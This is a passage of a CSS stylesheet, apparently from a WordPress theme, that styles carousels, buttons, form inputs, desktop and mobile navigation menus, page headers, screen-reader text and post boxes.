  display: table;
}

.dcell {
  display: table-cell;
  vertical-align: middle;
}

.flex-middle {
  display: flex;
  align-items: center;
  justify-content: center;
}

.overflow {
  overflow: hidden;
}

.overlay {
  position: absolute;
  top: 0;
  left: 0;
  background: #fff;
  opacity: 0.8;
  width: 100%;
  height: 100%;
  z-index: -1;
}

.gaps {
  clear: both;
  height: 20px;
  display: block;
}
.gaps.size-2x {
  height: 40px;
}

.under-line {
  display: inline;
  background-size: 0 1px;
  background-position: 0 100%;
  background-repeat: no-repeat;
  background-image: linear-gradient(0deg, #fff, #f5f5f5);
}
.under-line:hover {
  background-size: 100% 1px;
}

.link-details {
  display: inline-block;
  font-family: "Inter", sans-serif;
  font-size: 14px;
  font-weight: 600;
  text-transform: uppercase;
  color: #fe8423;
}
.link-details:visited {
  color: #fe8423;
}
.link-details i {
  margin-right: 8px;
  transition: margin 0.3s ease;
  -webkit-transition: margin 0.3s ease;
  -moz-transition: margin 0.3s ease;
  -o-transition: margin 0.3s ease;
  -ms-transition: margin 0.3s ease;
}
.link-details:hover i {
  margin-right: 4px;
}

.btn-details {
  display: inline-block;
  text-align: center;
  line-height: 38px;
  width: 38px;
  height: 38px;
  color: #1b1d21;
  background: rgba(220, 219, 219, 0.5);
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.btn-details i:before {
  font-size: 16px;
}
.btn-details:hover {
  color: #fff;
  background: #fe8423;
}

.owl-carousel .owl-dots {
  position: absolute;
  bottom: -80px;
  left: 0;
  width: 100%;
}
.owl-carousel .owl-dots button.owl-dot {
  position: relative;
  width: 30px;
  height: 30px;
  text-align: center;
  border: 1px solid transparent;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.owl-carousel .owl-dots button.owl-dot span {
  position: absolute;
  content: "";
  top: 50%;
  left: 50%;
  margin: 0;
  width: 8px;
  height: 8px;
  background: #9d9ea2;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
  -webkit-transform: translate(-50%, -50%);
  -ms-transform: translate(-50%, -50%);
  transform: translate(-50%, -50%);
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.owl-carousel .owl-dots button.owl-dot.active {
  border-color: rgba(157, 158, 162, 0.5);
}
.owl-carousel .owl-dots button.owl-dot.active span {
  background: #fe8423;
}
.owl-carousel .owl-dots button.owl-dot:hover span {
  background: #fe8423;
}
.owl-carousel .owl-nav {
  position: absolute;
  width: 100%;
  top: 50%;
  left: 0;
  margin-top: -22px;
}
.owl-carousel .owl-nav button.owl-prev,
.owl-carousel .owl-nav button.owl-next {
  position: absolute;
  top: 0;
  color: #fff;
  font-size: 16px;
  width: 45px;
  height: 45px;
  line-height: 1;
  background: #1b1d21;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.owl-carousel .owl-nav button.owl-prev:hover,
.owl-carousel .owl-nav button.owl-next:hover {
  background: #fe8423;
}
.owl-carousel .owl-nav button.owl-prev {
  left: 30px;
}
.owl-carousel .owl-nav button.owl-next {
  right: 30px;
}

.section-baner.elementor-widget-text-editor h3 {
  margin-bottom: 2px;
  color: #fff;
}
.section-baner.elementor-widget-text-editor p {
  text-transform: uppercase;
}

.slide-rev-subtitle {
  font-family: "Inter", sans-serif !important;
  font-weight: 600 !important;
  font-size: 11px !important;
  text-transform: uppercase;
  line-height: 28px !important;
  background: rgba(255, 255, 255, 0.1);
  border: 1px solid rgba(255, 255, 255, 0.3);
  padding: 0 10px 0 4px;
  -webkit-border-radius: 15px;
  -moz-border-radius: 15px;
  border-radius: 15px;
}
.slide-rev-subtitle span {
  font-weight: bold;
  color: #fe8423;
  background: #fff;
  padding: 4px 11px;
  margin-right: 6px;
  -webkit-border-radius: 11px;
  -moz-border-radius: 11px;
  border-radius: 11px;
}

.hl-text {
  font-weight: 400 !important;
  color: #55bb53 !important;
}

section.is-stuck section.off-boxshadow {
  box-shadow: none !important;
}

/*--------------------------------------------------------------
# Elements
--------------------------------------------------------------*/
html {
  box-sizing: border-box;
}

*,
*:before,
*:after {
  /* Inherit box-sizing to make it easier to change the property for components that leverage other behavior; see https://css-tricks.com/inheriting-box-sizing-probably-slightly-better-best-practice/ */
  box-sizing: inherit;
}

body {
  background: #fff;
  /* Fallback for when there is no custom background color defined. */
}

hr {
  background-color: #ccc;
  border: 0;
  height: 1px;
  margin-bottom: 1.5em;
}

ul,
ol {
  margin: 0 0 20px;
  padding-left: 18px;
}

ul {
  list-style: disc;
}

ol {
  list-style: decimal;
}

li > ul,
li > ol {
  margin-bottom: 0;
  margin-left: 1.5em;
}

dt {
  font-weight: 700;
}

dd {
  margin: 0 1.5em 1.5em;
}

.none-style {
  list-style: none;
  padding-left: 0;
}

img {
  height: auto;
  /* Make sure images are scaled correctly. */
  max-width: 100%;
  /* Adhere to container width. */
}

figure {
  margin: 1em 0;
  /* Extra wide images within figure tags don't overflow the content area. */
}

table {
  margin: 0 0 1.5em;
  width: 100%;
  border-collapse: collapse;
  border-spacing: 0;
  border-width: 1px 0 0 1px;
}

caption,
td,
th {
  padding: 0;
  font-weight: normal;
  text-align: left;
}

table,
th,
td {
  border: 1px solid #eee;
}

th {
  font-weight: 700;
}

th,
td {
  padding: 0.4375em;
}

/*--------------------------------------------------------------
# Forms
--------------------------------------------------------------*/
/* #button Group
================================================== */
.octf-btn {
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  font-size: 14px;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
  padding: 14px 30px;
  line-height: 1.42857143;
  display: inline-block;
  margin-bottom: 0;
  text-decoration: none;
  text-transform: uppercase;
  white-space: nowrap;
  vertical-align: middle;
  font-family: "Inter", sans-serif;
  font-weight: 600;
  text-align: center;
  background: #fe8423;
  cursor: pointer;
  border: 1px solid transparent;
  color: #fff;
  outline: none;
  position: relative;
}
.octf-btn:hover, .octf-btn:focus {
  background: #1b1d21;
}
.octf-btn i {
  margin-right: 12px;
}
.octf-btn:hover, .octf-btn:visited {
  color: #fff;
}

.octf-btn-dark {
  background: #1b1d21;
}
.octf-btn-dark:visited {
  color: #fff;
}
.octf-btn-dark:hover, .octf-btn-dark:focus {
  color: #fff;
  background: #fe8423;
}

.octf-btn-light {
  background: #fff;
  color: #1b1d21;
}
.octf-btn-light:visited {
  color: #1b1d21;
}
.octf-btn-light:hover, .octf-btn-light:focus {
  color: #fff;
  background: #fe8423;
}

.octf-btn.octf-btn-border {
  background: transparent;
  border-color: #fe8423;
  color: #fe8423;
}
.octf-btn.octf-btn-border:visited {
  color: #fe8423;
}
.octf-btn.octf-btn-border:hover, .octf-btn.octf-btn-border:focus {
  background: #fe8423;
  color: #fff;
}
.octf-btn.octf-btn-border.octf-btn-light {
  border-color: #fff;
  color: #fff;
}
.octf-btn.octf-btn-border.octf-btn-light:hover, .octf-btn.octf-btn-border.octf-btn-light:focus {
  background: #fff;
  color: #1b1d21;
}
.octf-btn.octf-btn-border.octf-btn-dark {
  border-color: #1b1d21;
  color: #1b1d21;
}
.octf-btn.octf-btn-border.octf-btn-dark:hover, .octf-btn.octf-btn-border.octf-btn-dark:focus {
  background: #1b1d21;
  color: #fff;
}

input[type=text],
input[type=email],
input[type=url],
input[type=password],
input[type=search],
input[type=number],
input[type=tel],
input[type=range],
input[type=date],
input[type=month],
input[type=week],
input[type=time],
input[type=datetime],
input[type=datetime-local],
input[type=color],
textarea {
  color: #666666;
  border: 1px solid #dbdbdb;
  padding: 11px 24px;
  box-sizing: border-box;
  outline: none;
  font-size: 14px;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
input[type=text]:focus,
input[type=email]:focus,
input[type=url]:focus,
input[type=password]:focus,
input[type=search]:focus,
input[type=number]:focus,
input[type=tel]:focus,
input[type=range]:focus,
input[type=date]:focus,
input[type=month]:focus,
input[type=week]:focus,
input[type=time]:focus,
input[type=datetime]:focus,
input[type=datetime-local]:focus,
input[type=color]:focus,
textarea:focus {
  color: #666666;
}

select {
  font-family: "Inter", sans-serif;
  font-size: 14px;
  border: 1px solid #dbdbdb;
  outline: none;
}

textarea {
  width: 100%;
  padding-top: 18px;
  padding-bottom: 18px;
  height: 120px;
}

::-webkit-input-placeholder {
  /* Chrome/Opera/Safari */
  color: #5f5f5f;
}

::-moz-placeholder {
  /* Firefox 19+ */
  color: #5f5f5f;
}

:-ms-input-placeholder {
  /* IE 10+ */
  color: #5f5f5f;
}

:-moz-placeholder {
  /* Firefox 18- */
  color: #5f5f5f;
}

/*--------------------------------------------------------------
# Navigation
--------------------------------------------------------------*/
/*--------------------------------------------------------------
## Links
--------------------------------------------------------------*/
a {
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  color: #1b1d21;
  text-decoration: none;
}
a:visited {
  color: #1b1d21;
}
a:hover, a:focus, a:active {
  color: #fe8423;
  text-decoration: none;
}
a:focus {
  outline: 0;
}
a:hover, a:active {
  outline: 0;
}

/*--------------------------------------------------------------
## Top Bar
--------------------------------------------------------------*/
/*--------------------------------------------------------------
## Logo
--------------------------------------------------------------*/
#site-logo {
  padding: 10px 0;
  display: inline-flex;
  vertical-align: middle;
  align-items: center;
  justify-content: center;
  line-height: 1;
}
#site-logo img {
  width: 140px;
}

/*--------------------------------------------------------------
## Menus
--------------------------------------------------------------*/
.main-navigation ul {
  list-style: none;
  padding-left: 0;
}

.site-header {
  background: #fff;
  position: relative;
  z-index: 10;
}
.site-header.header-overlay {
  background: transparent;
  border-color: rgba(255, 255, 255, 0.1);
  -webkit-box-shadow: 0px 0px 0px 0px rgba(42, 67, 113, 0.15);
  -moz-box-shadow: 0px 0px 0px 0px rgba(42, 67, 113, 0.15);
  box-shadow: 0px 0px 0px 0px rgba(42, 67, 113, 0.15);
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
}
.site-header.header-overlay .header-topbar {
  background: rgba(255, 255, 255, 0.1);
}
.site-header.header-overlay .octf-cta-icons i {
  color: #fff;
}
.site-header.header-overlay .contact-header span {
  color: #ccc;
}
.site-header.header-overlay .contact-header span.main-text,
.site-header.header-overlay .contact-header span a {
  color: #fff;
}

.octf-mainbar-container {
  display: flex;
  flex-flow: row wrap;
  align-items: stretch;
}

.octf-mainbar {
  display: flex;
  flex-flow: column wrap;
  flex: 1 auto;
}

.octf-main-header .octf-mainbar-row {
  display: flex;
  flex-wrap: nowrap;
  align-items: stretch;
  flex: 1 auto;
}

.octf-mainbar-row > [class^=octf-col] {
  display: flex;
  align-items: stretch;
  position: static;
}

.octf-mainbar-row .octf-col {
  flex-basis: 0;
  flex-grow: 0.65;
  max-width: 100%;
  width: 100%;
  min-height: 1px;
  padding-right: 15px;
  padding-left: 15px;
}
.octf-mainbar-row .octf-col.menu-col {
  justify-content: flex-end;
}

.octf-mainbar-row > [class^=octf-col] {
  flex-flow: row nowrap;
}
.octf-mainbar-row > [class^=octf-col].text-left {
  justify-content: flex-start;
}
.octf-mainbar-row > [class^=octf-col].text-center {
  justify-content: center;
}
.octf-mainbar-row > [class^=octf-col].text-right {
  justify-content: flex-end;
}

.octf-main-header .octf-row > div:empty {
  display: none;
}

.octf-row {
  margin-right: -15px;
  margin-left: -15px;
}

.octf-col:before {
  display: inline-flex;
}

.octf-main-header .octf-row .octf-col-auto {
  flex: 0 0 auto;
  width: auto;
  max-width: none;
}

.octf-header-module {
  display: inline-flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  position: relative;
}

/* Main Menu */
.main-navigation {
  position: relative;
  display: inline-block;
  vertical-align: middle;
  height: 100%;
  width: auto;
}

.main-navigation ul {
  font-family: "Inter", sans-serif;
  font-weight: 600;
  font-size: 14px;
  list-style: none;
  margin: 0px 0px;
  padding: 0px 0px;
}

.main-navigation > ul {
  position: relative;
  display: flex;
  width: 100%;
  vertical-align: middle;
  height: 100%;
}

.main-navigation > ul > li {
  margin: 0px 29px;
  padding: 0px 0px;
  float: left;
  position: relative;
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  align-items: center;
  height: 100%;
}
.main-navigation > ul > li:last-child {
  margin-right: 0;
}
.main-navigation > ul > li:first-child {
  margin-left: 0;
}
.main-navigation > ul > li:before {
  content: "";
  position: absolute;
  left: 0;
  bottom: 0;
  width: 100%;
  height: 3px;
  background: #fe8423;
  opacity: 0;
  transition: all 0.3s ease-in-out;
  -webkit-transition: all 0.3s ease-in-out;
  -moz-transition: all 0.3s ease-in-out;
  -o-transition: all 0.3s ease-in-out;
  -ms-transition: all 0.3s ease-in-out;
}
.main-navigation > ul > li:hover > a {
  color: #fe8423;
}
.main-navigation > ul > li:hover:before {
  opacity: 1;
}

.main-navigation > ul > li > a {
  position: relative;
  display: inline-block;
  padding: 10px 0px;
  line-height: 35px;
  text-decoration: none;
  text-align: center;
  outline: none;
  color: #1a1b1e;
  white-space: nowrap;
  transition: all 0.3s ease-in-out;
  -webkit-transition: all 0.3s ease-in-out;
  -moz-transition: all 0.3s ease-in-out;
  -o-transition: all 0.3s ease-in-out;
  -ms-transition: all 0.3s ease-in-out;
}

.octf-main-header .main-navigation > ul > li > a {
  padding: 20px 0;
}

.main-navigation ul ul.sub-menu {
  float: none;
  margin: 0px 0px;
  padding: 0px 0px;
  background: #fff;
  min-width: 250px;
  white-space: nowrap;
  position: absolute;
  top: 100%;
  left: -32px;
  z-index: 10;
  visibility: hidden;
  opacity: 0;
  -webkit-transform: translateY(30px);
  -ms-transform: translateY(30px);
  transform: translateY(30px);
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  transition: all 0.3s ease-in-out;
  -webkit-transition: all 0.3s ease-in-out;
  -moz-transition: all 0.3s ease-in-out;
  -o-transition: all 0.3s ease-in-out;
  -ms-transition: all 0.3s ease-in-out;
  box-shadow: 8px 8px 30px 0px rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0px rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0px rgba(0, 0, 0, 0.12);
  box-sizing: border-box;
}
.main-navigation ul ul.sub-menu:before {
  content: "";
  position: absolute;
  height: 12px;
  width: 100%;
  top: -12px;
  left: 0;
}
.main-navigation ul ul.sub-menu:after {
  content: "";
  position: absolute;
  height: 15px;
  width: 15px;
  top: -5px;
  left: 50px;
  opacity: 1;
  z-index: -1;
  background: #fff;
  -webkit-border-radius: 2px;
  -moz-border-radius: 2px;
  border-radius: 2px;
  -webkit-transform: rotate(45deg);
  -ms-transform: rotate(45deg);
  transform: rotate(45deg);
}
.main-navigation ul ul.sub-menu ul:after {
  display: none;
}

.main-navigation > ul > li.menu-item-has-children > a {
  padding-right: 17px;
}

.main-navigation > ul > li.menu-item-has-children:last-child > a:after {
  right: 0px;
}

.main-navigation ul li li {
  display: block;
  position: relative;
}

.main-navigation ul li li a {
  font-size: 14px;
  line-height: 30px;
  color: #1a1b1e;
  text-align: left;
  display: block;
  padding: 8px 30px;
  position: relative;
  text-decoration: none;
  outline: none;
  border-bottom: 1px solid #f5f5f5;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}

.main-navigation ul li li:first-child a {
  border-top-left-radius: 5px;
  border-top-right-radius: 5px;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
  -webkit-border-top-left-radius: 5px;
  -webkit-border-top-right-radius: 5px;
  -webkit-border-bottom-right-radius: 0;
  -webkit-border-bottom-left-radius: 0;
  -moz-border-radius-topleft: 5px;
  -moz-border-radius-topright: 5px;
  -moz-border-radius-bottomright: 0;
  -moz-border-radius-bottomleft: 0;
}

.main-navigation ul li li:last-child a {
  border: none;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 5px;
  border-bottom-left-radius: 5px;
  -webkit-border-top-left-radius: 0;
  -webkit-border-top-right-radius: 0;
  -webkit-border-bottom-right-radius: 5px;
  -webkit-border-bottom-left-radius: 5px;
  -moz-border-radius-topleft: 0;
  -moz-border-radius-topright: 0;
  -moz-border-radius-bottomright: 5px;
  -moz-border-radius-bottomleft: 5px;
}

.main-navigation ul li li a:hover,
.main-navigation ul ul.sub-menu li.current-menu-item > a,
.main-navigation ul ul.sub-menu li.current-menu-ancestor > a {
  color: #fe8423;
  background: #f5f5f5;
}

.main-navigation.no-line ul li li a:hover,
.main-navigation.no-line ul ul.sub-menu li.current-menu-item > a,
.main-navigation.no-line ul ul.sub-menu li.current-menu-ancestor > a {
  padding-left: 0;
}

.main-navigation ul > li.menu-item-has-children > a:after {
  position: absolute;
  right: 1px;
  top: 50%;
  margin-top: -3px;
  font-family: "Flaticon";
  content: "";
  font-size: 9px;
  line-height: 1;
  color: #b2b2b2;
  font-weight: 400;
}
.main-navigation ul > li.menu-item-has-children:hover > a {
  color: #fe8423;
}
.main-navigation ul > li.menu-item-has-children:hover > a:after {
  color: #fe8423;
}

.main-navigation ul > li.menu-item-has-children > a:hover:after {
  color: #fe8423;
}

.main-navigation ul > li li.menu-item-has-children > a:after {
  position: absolute;
  content: "";
  font-family: Flaticon;
  top: 50%;
  right: 28px;
  margin-top: -5px;
  font-size: 9px;
  color: #b6b6b6;
  transition: all 0.3s ease-in-out;
  -webkit-transition: all 0.3s ease-in-out;
  -moz-transition: all 0.3s ease-in-out;
  -o-transition: all 0.3s ease-in-out;
  -ms-transition: all 0.3s ease-in-out;
}

.main-navigation ul li ul.sub-menu ul.sub-menu {
  left: 100%;
  top: -25px;
  transition: all 0.35s ease-in-out;
  -webkit-transition: all 0.35s ease-in-out;
  -moz-transition: all 0.35s ease-in-out;
  -o-transition: all 0.35s ease-in-out;
  -ms-transition: all 0.35s ease-in-out;
}

.main-navigation ul li:hover > ul.sub-menu {
  visibility: visible;
  opacity: 1;
}

.main-navigation ul > li:hover > ul.sub-menu {
  -webkit-transform: translateY(12px);
  -ms-transform: translateY(12px);
  transform: translateY(12px);
}

.header-2 .main-navigation ul > li.menu-item-has-children > a:after {
  margin-top: -6px;
}

@-webkit-keyframes stickySlideUp {
  from {
    -webkit-transform: translateY(10%);
    transform: translateY(10%);
  }
  to {
    -webkit-transform: translateY(0);
    transform: translateY(0);
  }
}
@keyframes stickySlideUp {
  from {
    -webkit-transform: translateY(10%);
    transform: translateY(10%);
  }
  to {
    -webkit-transform: translateY(0);
    transform: translateY(0);
  }
}
@-webkit-keyframes stickySlideDown {
  from {
    -webkit-transform: translateY(-100%);
    transform: translateY(-100%);
  }
  to {
    -webkit-transform: translateY(0);
    transform: translateY(0);
  }
}
@keyframes stickySlideDown {
  from {
    -webkit-transform: translateY(-100%);
    transform: translateY(-100%);
  }
  to {
    -webkit-transform: translateY(0);
    transform: translateY(0);
  }
}
section.is-stuck {
  -webkit-animation: stickySlideDown 0.65s cubic-bezier(0.23, 1, 0.32, 1) both;
  -moz-animation: stickySlideDown 0.65s cubic-bezier(0.23, 1, 0.32, 1) both;
  animation: stickySlideDown 0.65s cubic-bezier(0.23, 1, 0.32, 1) both;
}

section.is-stuck {
  position: fixed;
  left: 0;
  right: 0;
  top: 0;
  z-index: 99;
}

.admin-bar .is-stuck,
.admin-bar .header-overlay {
  top: 32px;
}

/*Mega Menu*/
.mega-menu-content .ot-flex-column-horizontal .elementor-widget-wrap {
  flex-wrap: wrap;
}

.mega-menu-content .ot-flex-column-horizontal .elementor-widget-wrap > .elementor-widget {
  display: block;
  width: 100%;
}

.ot-flex-column-horizontal .mega-menu-content .elementor-widget-wrap {
  flex-wrap: wrap;
}

.ot-flex-column-horizontal .mega-menu-content .elementor-widget-wrap > .elementor-widget {
  display: block;
  width: 100%;
}

.main-navigation > ul > li.is-mega-menu ul {
  background: none;
  padding: 0;
}

.main-navigation > ul > li.is-mega-menu ul li {
  padding: 0;
}

.main-navigation > ul > li.is-mega-menu ul.sub-menu.mmenu-boxed {
  min-width: 600px;
}

.main-navigation > ul > li.is-mega-menu ul.sub-menu.mmenu-full-width {
  width: 100vw;
}

/*--------------------------------------------------------------
## Header Mobile
--------------------------------------------------------------*/
.header_mobile {
  display: none;
}

@media only screen and (max-width: 1024px) {
  .octf-main-header {
    display: none;
  }

  .header-topbar {
    display: none;
  }

  .site-header {
    background: #fff;
    -webkit-box-shadow: 2px 2px 15px 0px rgba(42, 67, 113, 0.15);
    -moz-box-shadow: 2px 2px 15px 0px rgba(42, 67, 113, 0.15);
    box-shadow: 2px 2px 15px 0px rgba(42, 67, 113, 0.15);
  }

  .header_mobile {
    display: block;
    width: 100%;
    background: #fff;
  }
  .header_mobile.is-stuck {
    box-shadow: 2px 2px 15px 0px rgba(42, 67, 113, 0.15);
  }

  .header_mobile .mlogo_wrapper {
    position: relative;
    padding: 15px 0px;
  }
  .header_mobile .mlogo_wrapper img {
    height: 30px;
  }

  .header_mobile .mlogo_wrapper .mobile_logo {
    float: left;
  }

  #mmenu_toggle {
    position: absolute;
    cursor: pointer;
    width: 26px;
    height: 20px;
    right: 0px;
    margin-top: -10px;
    top: 50%;
  }

  #mmenu_toggle button {
    position: absolute;
    left: 0;
    top: 50%;
    margin: -2px 0 0;
    background: #1b1d21;
    height: 4px;
    padding: 0;
    border: none;
    width: 100%;
    transition: all 0.3s ease;
    -webkit-transition: all 0.3s ease;
    -moz-transition: all 0.3s ease;
    -o-transition: all 0.3s ease;
    -ms-transition: all 0.3s ease;
    outline: none;
    border-radius: 2px;
  }

  #mmenu_toggle button:before {
    content: "";
    position: absolute;
    left: 0;
    top: -8px;
    width: 26px;
    height: 4px;
    background: #1b1d21;
    -webkit-transform-origin: 1.5px center;
    transform-origin: 1.5px center;
    transition: all 0.3s ease;
    -webkit-transition: all 0.3s ease;
    -moz-transition: all 0.3s ease;
    -o-transition: all 0.3s ease;
    -ms-transition: all 0.3s ease;
    border-radius: 2px;
  }

  #mmenu_toggle button:after {
    content: "";
    position: absolute;
    left: 0;
    bottom: -8px;
    width: 26px;
    height: 4px;
    background: #1b1d21;
    -webkit-transform-origin: 1.5px center;
    transform-origin: 1.5px center;
    transition: all 0.3s ease;
    -webkit-transition: all 0.3s ease;
    -moz-transition: all 0.3s ease;
    -o-transition: all 0.3s ease;
    -ms-transition: all 0.3s ease;
    border-radius: 2px;
  }

  #mmenu_toggle.active button {
    background: none;
  }

  #mmenu_toggle.active button:before {
    top: 0;
    -webkit-transform: rotate3d(0, 0, 1, -45deg);
    transform: rotate3d(0, 0, 1, -45deg);
    -webkit-transform-origin: 50% 50%;
    transform-origin: 50% 50%;
  }

  #mmenu_toggle.active button:after {
    bottom: 0;
    -webkit-transform: rotate3d(0, 0, 1, 45deg);
    transform: rotate3d(0, 0, 1, 45deg);
    -webkit-transform-origin: 50% 50%;
    transform-origin: 50% 50%;
  }

  .header_mobile .mobile_nav {
    display: none;
    background: #fff;
  }

  .header_mobile .mobile_nav .mobile_mainmenu {
    margin: 0;
    padding: 0;
  }

  .header_mobile .mobile_nav .mobile_mainmenu ul {
    position: relative;
    margin: 0;
    padding: 0;
    margin-left: 15px;
    display: none;
  }

  .header_mobile .mobile_nav.collapse .mobile_mainmenu ul {
    display: none;
  }

  .header_mobile .mobile_nav .mobile_mainmenu li {
    position: relative;
    list-style: none;
  }

  .header_mobile .mobile_nav .mobile_mainmenu li a {
    padding: 9px 0;
    display: block;
    color: #1b1d21;
    font-weight: 600;
    border-bottom: 1px solid #e5e5e5;
  }

  .header_mobile .mobile_nav .mobile_mainmenu > li:last-child > a {
    border: none;
  }

  .header_mobile .mobile_nav .mobile_mainmenu li li a {
    font-size: 15px;
  }

  .header_mobile .mobile_nav .mobile_mainmenu li li a:hover,
.header_mobile .mobile_nav .mobile_mainmenu ul > li > ul > li.current-menu-ancestor > a {
    color: #fe8423;
  }

  .header_mobile .mobile_nav .mobile_mainmenu > li.menu-item-has-children .arrow {
    color: #fff;
    position: absolute;
    display: block;
    right: 0;
    top: 0;
    cursor: pointer;
    width: 40px;
    height: auto;
    padding: 9px 0;
    line-height: inherit;
    text-align: right;
    box-sizing: border-box;
  }

  .header_mobile .mobile_nav .mobile_mainmenu > li.menu-item-has-children .arrow i {
    color: #9397a7;
    display: inline-block;
    line-height: 1;
    -webkit-transition: transform 0.3s ease-in-out;
    -moz-transition: transform 0.3s ease-in-out;
    transition: transform 0.3s ease-in-out;
  }

  .header_mobile .mobile_nav .mobile_mainmenu > li.menu-item-has-children .arrow i:before {
    font-size: 10px;
  }

  .header_mobile .mobile_nav .mobile_mainmenu > li.menu-item-has-children .arrow.active i {
    -webkit-transform: rotate(45deg);
    -moz-transform: rotate(45deg);
    transform: rotate(45deg);
  }

  .header_mobile .mobile_nav .mobile_mainmenu > li > a:hover, .header_mobile .mobile_nav .mobile_mainmenu > li.current-menu-item > a,
.header_mobile .mobile_nav .mobile_mainmenu > li.current-menu-ancestor > a {
    color: #fe8423;
  }
}
@media only screen and (max-width: 767px) {
  .header_mobile .mlogo_wrapper {
    width: 100%;
  }
}
@media only screen and (max-width: 320px) {
  .mobile_logo img {
    max-width: 230px;
    max-height: 47px;
  }
}
/*--------------------------------------------------------------
## Page Header
--------------------------------------------------------------*/
.page-header {
  width: 100%;
  height: 400px;
  font-family: "Inter", sans-serif;
  font-weight: 700;
  background: #1b1d21 center center no-repeat;
  background-size: cover;
}
.page-header .inner {
  margin-top: -13px;
}
.page-header .page-title {
  font-size: 42px;
  color: #fff;
  margin-bottom: 0;
  flex: 1;
  padding: 10px 0;
}
.page-header .breadcrumbs {
  margin-bottom: 0;
  font-size: 14px;
  text-transform: uppercase;
  font-weight: 600;
}
.page-header .breadcrumbs li {
  display: inline-block;
  color: #fff;
}
.page-header .breadcrumbs li:before {
  content: "";
  font-family: "Flaticon";
  font-size: 9px;
  color: rgba(255, 255, 255, 0.6);
  margin: -2px 8px 0;
  display: inline-block;
  vertical-align: middle;
}
.page-header .breadcrumbs li:first-child:before {
  display: none;
}
.page-header .breadcrumbs li a {
  color: rgba(255, 255, 255, 0.6);
}
.page-header .breadcrumbs li a:hover {
  color: #fff;
}

@media (max-width: 992px) {
  .page-header .inner {
    display: block;
  }
}
@media (max-width: 767px) {
  .page-header .container {
    width: 100%;
  }
  .page-header .page-title {
    font-size: 36px;
  }
  .page-header .breadcrumbs {
    font-size: 12px;
  }
}
@media (max-width: 600px) {
  .page-header {
    height: 200px;
    padding: 40px 0;
  }
  .page-header .page-title {
    font-size: 30px;
  }
}
/*--------------------------------------------------------------
# Accessibility
--------------------------------------------------------------*/
/* Text meant only for screen readers. */
.screen-reader-text {
  border: 0;
  clip: rect(1px, 1px, 1px, 1px);
  clip-path: inset(50%);
  height: 1px;
  margin: -1px;
  overflow: hidden;
  padding: 0;
  position: absolute !important;
  width: 1px;
  word-wrap: normal !important;
  /* Many screen reader and browser combinations announce broken words as they would appear visually. */
}
.screen-reader-text:focus {
  background-color: #f1f1f1;
  border-radius: 3px;
  box-shadow: 0 0 2px 2px rgba(0, 0, 0, 0.6);
  clip: auto !important;
  clip-path: none;
  color: #21759b;
  display: block;
  font-size: 14px;
  font-weight: bold;
  height: auto;
  left: 5px;
  line-height: normal;
  padding: 15px 23px 14px;
  text-decoration: none;
  top: 5px;
  width: auto;
  z-index: 100000;
  /* Above WP toolbar. */
}

/* Do not show the outline on the skip link target. */
#content[tabindex="-1"]:focus {
  outline: 0;
}

/*--------------------------------------------------------------
# Alignments
--------------------------------------------------------------*/
.alignleft {
  float: left;
  margin-right: 1.5em;
}

.alignright {
  float: right;
  margin-left: 1.5em;
}

.aligncenter {
  clear: both;
  display: block;
  margin-left: auto;
  margin-right: auto;
}

.text-center {
  text-align: center;
}

.text-left {
  text-align: left;
}

.text-right {
  text-align: right;
}

/*--------------------------------------------------------------
# Clearings
--------------------------------------------------------------*/
.clear:before,
.clear:after,
.entry-content:before,
.entry-content:after,
.comment-content:before,
.comment-content:after,
.site-header:before,
.site-header:after,
.site-content:before,
.site-content:after,
.site-footer:before,
.site-footer:after {
  content: "";
  display: table;
  table-layout: fixed;
}

.clear:after,
.entry-content:after,
.comment-content:after,
.site-header:after,
.site-content:after,
.site-footer:after {
  clear: both;
}

/*--------------------------------------------------------------
# Content
--------------------------------------------------------------*/
/*--------------------------------------------------------------
## Posts and pages
--------------------------------------------------------------*/
/*posts and pages*/
.entry-content {
  padding: 90px 0 110px;
}

.post-box {
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.post-box .post-inner {
  background: #fff;
  margin-bottom: 60px;
  overflow: hidden;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.1);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.1);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.1);
